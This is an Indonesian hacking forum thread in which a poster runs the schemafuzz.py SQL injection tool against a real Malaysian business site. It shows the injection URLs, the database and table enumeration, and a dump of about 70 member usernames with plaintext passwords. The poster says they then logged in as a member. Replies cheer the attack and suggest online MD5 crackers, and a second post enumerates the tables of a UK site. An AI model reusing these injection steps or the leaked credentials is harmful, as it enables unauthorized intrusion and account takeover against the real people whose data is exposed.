Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

site'a malingshit...

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561 --findcol

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://ccs.my/news.php?id=1561--
[+] Evasion Used: "+" "--"
[+] 06:15:17
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] darkc0de URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5
[-] Done!

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --dbs

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:17:31
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0] ccs_myccs
[1] test

[-] 06:17:50
[-] Total URL Requests 4
[-] Done

Don't forget to check schemafuzzlog.txt

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --schema -D ccs_myccs

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:19:09
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Showing Tables & Columns from database "ccs_myccs"
[+] Number of Tables: 36

[Database]: ccs_myccs
[Table: Columns]

[0]addressbook: id,cat_id,cat_id2,cat_id3,update_date,submit_date,name,person,ic,gender,add1,add2,add3,tel,hp,fax,username,password,email,note
[1]addressbook_cat: id,sub_id,name
[2]addressbook_pc: id,add_id,submit_date,name,cpu,ram,hd,vga,sound,cdrom,drive,keyboard,mouse,usb,port,networking,os,antivirus
[3]addressbook_pc_report: id,add_id,submit_date,name,note
[4]cat: id,name,image,visit,bodytag,keyword,desc,description
[5]consignment: id,customer_id,borrow,name,user
[6]enquiry: user_id,area_id,update_date,submit_date,company,name,gender,add1,add2,postcode,home,office,fax,mobile,email,ic,passport,nationality,os,dealer,note
[7]enquiry_area: id,parent_id,top_id,name
[8]faq: id,cat_id,question,answer
[9]faqcat: id,name,visit,description
[10]hosting: id,update_date,name,owner,dealer,server_id,expire,price,note
[11]hostingserver: id,name
[12]invoice_item: id,invoice_id,update_date,submit_date,name,description,qty,price
[13]logs: id,date,name,description
[14]logs_hr: id,date,name,description
[15]member: id,area_id,update_date,submit_date,company,name,gender,add1,add2,username,office,fax,password,email,level,note,staff,dealer,hosting,member
[16]member_leave: id,member_id,update_date,submit_date,leave_date,name,status,note,total_day
[17]member_report: id,member_id,update_date,submit_date,report_date,name,report,total_hour
[18]member_sales: id,member_id,sales_id,update_date,submit_date,sales_date,account_date,bankin_date,name,note,payment,price,cost,profit
[19]member_task: id,customer_id,member_id,leader_id,access_id1,access_id2,access_id3,update_date,submit_date,followup_date,complete_date,name,status,note
[20]member_task_report: id,member_id,task_id,update_date,submit_date,note,time
[21]member_type: id,parent_id,top_id,name
[22]news: id,name,description,submit_date,update_date,visit
[23]package: id,name
[24]package_item: id,package_name_id,product_id
[25]package_name: id,package_id,name
[26]payment: id,update_date,submit_date,invoice_date,name,note,total,sold,paid
[27]po: id,customer_id,update_date,submit_date,name,username
[28]po_item: id,po_id,update_date,name,description,qty,retail,price,note,username
[29]products: id,date1,visit,name1,name2,weight,cat1,cat2,type1,type2,description,image1,image2,price,price_us,offer,dealer,wholesale,cost,note,seller,bodytag,code,date2,date3,stock,stock1,stock2,stock3
[30]products_reserve: id,product_id,customer_id,update_date,submit_date,name,taken_date,username
[31]quotation: id,cat_id,customer_id,dealer_id,update_date,submit_date,quotation_date,invoice_date,po_date,name,invoice,username,remark,regards
[32]quotation_cat: id,sub_id,name
[33]quotation_item: id,quotation_id,update_date,name,description,qty,price,cost,note,username
[34]stock: id,product_id,update_date,submit_date,name,username,log
[35]type: id,name,image,visit,bodytag

[-] 06:45:44
[-] Total URL Requests 315
[-] Done

Don't forget to check schemafuzzlog.txt

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --dump -D ccs_myccs -T member -C id,username,password

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:51:41
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Dumping data from database "ccs_myccs" Table "member"
[+] and Column(s) ['id', 'username', 'password']
[+] Number of Rows: 71

[0] 1:cwtan:213:
[1] 2:fkyoon:jk45gb:
[2] 3:xtremecom:hasegawa:
[3] 4:kevinloh:nbv354:
[4] 5:jasonwong:vgb54n:
[5] 20:jeffery_yeoh:sc8bq1:
[6] 7:gtlau:fv62bx:
[7] 8:johan:ndxm532:
[8] 9:mohamed:hdx43n:
[9] 10:johnathan:jsch82d:
[10] 11:jamesgoh:s45xh2:
[11] 34:sean:dsc23:
[12] 13:phchan:ph118:
[13] 14:pccmy:suc51f:
[14] 23:ckphuah:s45f8:
[15] 15:cg-computers:hdxe45:
[16] 16:armen:h2dz52:
[17] 17:matthew:sc25x3:
[18] 18:kyzee:ds5jk7:
[19] 19:george:dh9n2m:
[20] 31:wooijin:wooijin:
[21] 22:raymond-liew:sf28b:
[22] 24:andrewgark:sc19nv:
[23] 25:jamil:sdc739:
[24] 26:irene_tew:kxn349:
[25] 27:chenlung:xun329:
[26] 28:ericlim:un39xv:
[27] 29:tradewinds:sdcb348:
[28] 30:myben:830712b:
[29] 32:brian:jxn267:
[30] 39:elongnet:ds5x8:
[31] 40:shabbir:scvs321h:
[32] 41:evergreen:sdfx125:
[33] 43:raymondlee:xh37b3:
[34] 44:cheryl:bds518:
[35] 45:gadgetzone:asd24h:
[36] 46:dmitri:gb536:
[37] 47:syedali:21gh4:
[38] 48:level3:213:
[39] 49:izmir:hgd752:
[40] 50:izwan:fhdr352:
[41] 51:ooigheetiong:njds641:
[42] 52:thenoiho:dsh629k:
[43] 53:desai:kdie83:
[44] 54:giapseng:sx4k8:
[45] 55:lionel:lionel6:
[46] 56:adrain:
[47] 57:iscc:nhfd63:
[48] 58:rovinlim:sdx413:
[49] 59:maxlee:fkpq134:
[50] 60:syukri:t5u7w2:
[51] 61:jaclyn:vgx216:
[52] 62:davidteoh:tr431k:
[53] 63:yeapch:dx164:
[54] 64:adrianquah:fgzu72:
[55] 65:jameskuick:sg623k:
[56] 66:raymondooi:she369:
[57] 67:cgcomputers:gxk518:
[58] 68:yckai:jh763:
[59] 80:lltan:x41jk8:
[60] 70:kltan:sdk327:
[61] 71:myitech:hgk967:
[62] 72:vss:fxs523:
[63] 73:atconsulting:sc42h6:
[64] 74:skfcomp:sd15h6:
[65] 75:hjwang:crdy483:
[66] 76:cheoh:peb357:
[67] 77:saidatul:sdt528:
[68] 78:shofi:sx39n43:
[69] 79:dynacomb:x4f5k2:
[70] 81:lltan:x41jk8:
[71] No data

[-] 06:55:38
[-] Total URL Requests 73
[-] Done

Don't forget to check schemafuzzlog.txt

Selanjut'a....
register jadi member'a...
(soal'a halaman login bwt member d sembunyiin)
trus login sebagai member yg username 'n password'a dah kita dpt itu...

hmm... nice show up

buset dah...
dumping DB user

nice bro
itu kan webnya g terencript md5 yah
nah klo schemafuzz baru dari darkc0de
bia langsung crack tu hash

makasih master atas share nya
soal nya belom pernah pake yang beginian hehehe
sekali lagi thanks for share 8)

wedew itu kagak di enkrip
parah bener tuh site

wahh...gilaa...mantebb...
gk trenkripmd5...parah dah....

wkekekeke

klo terenkrip MD5 mah..tinggal d decrypt ajah...
kan ada fastcrack ato MD5 decryptor yg online.....

he...he..

[+] Gathering MySQL Server Configuration...
Database: ukcds
User: ukcds@localhost
Version: 5.0.22-Debian_0ubuntu6.06.2-log
[+] Starting current users database extraction...

[Database]: ukcds

[Table: Columns]
[0]countries: id,country,country_code,zone_id
[1]document: document_id,document_reference,document_title,document_publish_date
,document_type_id,document_status,document_description,document_authors,document
_keywords,document_access,document_filename
[2]document_type: document_type_id,document_type,display_sequence
[3]event: event_id,event_title,event_date,event_end_date,event_times,event_statu
s,event_start_time,event_end_time,event_image,event_image_caption,event_image_x,
event_image_y,event_body,event_access,event_type_id,allow_booking,show_booking_l
ink
[4]event_bookings: event_booking_id,event_id,title,name,organisation,address,pos
tcode,phone,email,notes,booking_date,booking_status,booking_notes
[5]event_document: event_document_id,event_id,document_id,link_title
[6]event_type: event_type_id,event_type,display_sequence
[7]mail_list: email,name,last_modified_date
[8]members: member_id,member_acronym,member_name,member_body,member_image,member
_url,member_status,member_display_sequence
[9]news: news_id,news_type_id,news_title,news_image,news_image_caption,news_imag
e_x,news_image_y,news_body,news_status,news_publish_date,news_created_datetime,n
ews_last_modified
[10]news_type: news_type_id,news_type,news_status,order_by,page_id,display_seque
nce
[11]pages: page_id,page_status,page_type,cms_page_type,menu_parent,menu_type,men
u_name,menu_sequence,menu_include,require_login,page_filename,page_file_type,pag
e_file_qs,page_title,page_heading,meta_robots,meta_description,meta_keywords,pag
e_image,page_image_type,page_image_text,page_content,admin_notes
[12]person: person_id,person_title,person_first_name,person_surname,person_quali
fications,person_role,person_body,person_image,person_status,position_id
[13]position: position_id,position_name,position_sequence
[14]project: project_id,project_type_id,project_title,project_image,project_imag
e_caption,project_image_x,project_image_y,project_body,project_status,project_pu
blish_date,project_expiry_date,project_created_datetime,project_last_modified
[15]project_type: project_type_id,project_type,order_by,page_id,display_sequence

[16]site: site_id,site_status,site_closed_message,default_page_title,default_met
a_description,default_meta_keywords,bulletin_heading,bulletin,show_bulletin,news
_items_heading,news_items,show_news_items
[17]site_old: site_id,site_status,site_closed_message,default_page_title,default
_meta_description,default_meta_keywords,bulletin,show_bulletin
[18]user_log: log_id,user_id,action,action_time
[19]users: user_id,name,email,password,last_logged_in

[-] Done
Don't forget to check database.txt

http://www.ukcds.org.uk/pages.php?page= ... rom+users/*